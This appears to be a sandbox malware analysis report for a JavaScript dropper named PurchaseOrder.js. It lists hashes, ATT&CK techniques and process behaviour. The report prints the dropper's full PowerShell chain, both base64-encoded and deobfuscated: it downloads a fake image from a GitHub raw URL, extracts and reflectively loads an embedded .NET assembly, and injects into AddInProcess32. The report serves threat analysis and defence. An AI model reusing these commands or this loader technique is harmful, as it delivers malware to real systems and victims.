8906d935345492816ccfc993df85b2fb7d37519247aa063126f8b93e577090d0

General

Target

PurchaseOrder.js
Size

133KB
MD5

8f4dc9bb5911379994ef0cadf2953e0d
SHA1

456a8ba07ceab3066f9fd12f73d4f5da34549e50
SHA256

8906d935345492816ccfc993df85b2fb7d37519247aa063126f8b93e577090d0
SHA512

8a83e2be903573e7cb04031ed13297c1a1c9f65f32b6dacace36c52e9b818cf5536cc23d067c873f390a37da5c69a830b4d42aa4314d119d548008d77b29aa0b
SSDEEP

3072:gW5Bbi9oLFzWuLD1dsW66/Y9tTCFzxW5Bbi9oLFzWuLDn:+9opzWwD1mOGJCFzh9opzWwDn

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	856	powershell.exe
6	856	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1384	powershell.exe
856	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1384	powershell.exe
856	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	856	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 1384	1704	wscript.exe	30
PID 1704 wrote to memory of 1384	1704	wscript.exe	30
PID 1704 wrote to memory of 1384	1704	wscript.exe	30
PID 1384 wrote to memory of 856	1384	powershell.exe	32
PID 1384 wrote to memory of 856	1384	powershell.exe	32
PID 1384 wrote to memory of 856	1384	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\PurchaseOrder.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAOQBJAEQAaQBtAGEAZwBlAFUAcgBsACAAPQAgAGUAOAAwAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQwByAHkAcAB0AGUAcgBzAEEAbgBkAFQAbwBvAGwAcwBPAGYAaQBjAGkAYQBsAC8AWgBJAFAALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEQAZQB0AGEAaABOAG8AdABlAF8ASgAuAGoAcABnACAAZQA4ADAAOwA5AEkARAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAJwArACcAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbAAnACsAJwBpAGUAbgB0ADsAOQBJAEQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAA5AEkARAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAOQBJAEQAJwArACcAaQBtAGEAJwArACcAZwBlAFUAcgBsACkAOwA5AEkARABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdACcAKwAnADoAOgBVAFQARgA4ACcAKwAnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAA5AEkARABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwA5AEkARABzAHQAYQByAHQARgBsAGEAZwAgAD0AIABlACcAKwAnADgAMAAnACsAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAKwAnAGUAOAAnACsAJwAwADsAOQBJAEQAZQBuAGQARgBsAGEAZwAgAD0AIABlADgAMAA8ADwAQgBBACcAKwAnAFMARQA2ADQAXwBFAE4ARAA+AD4AZQA4ADAAOwA5AEkARABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgADkASQBEAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuACcAKwAnAGQAZQB4AE8AZgAoADkASQBEAHMAdABhAHIAdABGAGwAYQBnACkAOwA5AEkARABlAG4AZABJAG4AZABlAHgAIAA9ACAAOQBJAEQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAOQBJAEQAZQBuAGQARgBsAGEAZwApADsAOQBJAEQAJwArACcAcwB0ACcAKwAnAGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAA5AEkARABlAG4AZABJAG4AZABlAHgAIAAtAGcAJwArACcAdAAgADkASQBEAHMAJwArACcAdABhACcAKwAnAHIAdABJAG4AZABlAHgAOwA5AEkARABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAOQBJAEQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ADkASQBEAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAnACsAJwAgADkASQBEAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAA5AEkARABzAHQAYQByAHQASQBuAGQAZQB4ADsAOQBJAEQAYgBhAHMAJwArACcAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAA5AEkARABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAOQBJAEQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAOQBJAEQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ADkASQBEAGMAbwBtAG0AYQAnACsAJwBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAJwArACcAKAA5AEkARABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwA5AEkARABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoADkASQBEAGMAbwBtAG0AYQBuAGQAQgB5AHQAJwArACcAZQBzACkAOwA5AEkARAB2AGEAaQBNAGUAdABoAG8AJwArACcAZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAZQA4ADAAVgBBAEkAJwArACcAZQA4ADAAKQAnACsAJwA7ADkASQBEAHYAJwArACcAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAA5AEkARABuACcAKwAnAHUAbABsACwAIABAACgAZQA4ADAAdAB4AHQALgBlAGQAbwAvAHYAZQBkAC4AMgByAC4AMwA5AGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgBjADAAZAA0ADUAYgA2ADMAMgBlAGIAOQBlAGUANgAyAC0AYgB1AHAALwAvADoAcwBwAHQAdABoAGUAOAAwACwAIABlADgAMABkAGUAcwBhAHQAaQB2AGEAZABvAGUAOAAwACwAIABlADgAMABkAGUAcwBhAHQAaQB2AGEAZABvAGUAOAAwACwAJwArACcAIABlADgAMABkAGUAcwBhAHQAaQB2AGEAZABvAGUAOAAwACwAIABlADgAMABBAGQAZABJAG4AUAByAG8AYwAnACsAJwBlAHMAJwArACcAcwAzADIAZQA4ADAALAAgAGUAJwArACcAOAAwAGQAZQBzAGEAdABpAHYAYQBkAG8AZQA4ADAALAAnACsAJwAgAGUAOAAwAGQAZQBzAGEAdABpAHYAYQBkAG8AZQA4ADAAKQApADsAJwApACAALQBDAHIARQBQAEwAYQBDAEUAIAAnAGUAOAAwACcALABbAGMAaABhAHIAXQAzADkAIAAgAC0AQwByAEUAUABMAGEAQwBFACcAOQBJAEQAJwAsAFsAYwBoAGEAcgBdADMANgApACAAfAAmACAAKAAgACQAUwBoAEUATABsAEkAZABbADEAXQArACQAUwBoAEUAbABMAEkAZABbADEAMwBdACsAJwBYACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('9IDimageUrl = e80https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg e80;9IDwebClient = New-Object Sys'+'tem.Net.WebCl'+'ient;9IDimageBytes = 9IDwebClient.DownloadData(9ID'+'ima'+'geUrl);9IDimageText = [System.Text.Encoding]'+'::UTF8'+'.GetString(9IDimageBytes);9IDstartFlag = e'+'80'+'<<BASE64_START>>'+'e8'+'0;9IDendFlag = e80<<BA'+'SE64_END>>e80;9IDstartIndex = 9IDimageText.In'+'dexOf(9IDstartFlag);9IDendIndex = 9IDimageText.IndexOf(9IDendFlag);9ID'+'st'+'artIndex -ge 0 -and 9IDendIndex -g'+'t 9IDs'+'ta'+'rtIndex;9IDstartIndex += 9IDstartFlag.Length;9IDbase64Length ='+' 9IDendIndex - 9IDstartIndex;9IDbas'+'e64Command = 9IDimageText.Substring(9IDstartIndex, 9IDbase64Length);9IDcomma'+'ndBytes = [System.Convert]::FromBase64String'+'(9IDbase64Command);9IDloadedAssembly = [System.Reflection.Assembly]::Load(9IDcommandByt'+'es);9IDvaiMetho'+'d = [dnlib.IO.Home].GetMethod(e80VAI'+'e80)'+';9IDv'+'aiMethod.Invoke(9IDn'+'ull, @(e80txt.edo/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptthe80, e80desativadoe80, e80desativadoe80,'+' e80desativadoe80, e80AddInProc'+'es'+'s32e80, e'+'80desativadoe80,'+' e80desativadoe80));') -CrEPLaCE 'e80',[char]39 -CrEPLaCE'9ID',[char]36) |& ( $ShELlId[1]+$ShElLId[13]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
10d630b6c882722e75166601c161b344

SHA1
cc198c49b027d6568a28043619c7e4ab760a9d13

SHA256
490ded216514ceb069c64381a1981ee18009c86e181bcdab8ad6b41a3a9a7dcc

SHA512
2497b4630bdecc95f8758e3104873b24f1e0c9f0a5a02c69df2d882bef3cab2aa286a00e4037e150a0e3ed6ef0582c248edbdda71b49f0aa773d0e8c8e75eba5

Download Submit
memory/1384-4-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

Filesize
4KB

Download
memory/1384-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/1384-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1384-8-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-9-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-11-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-17-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing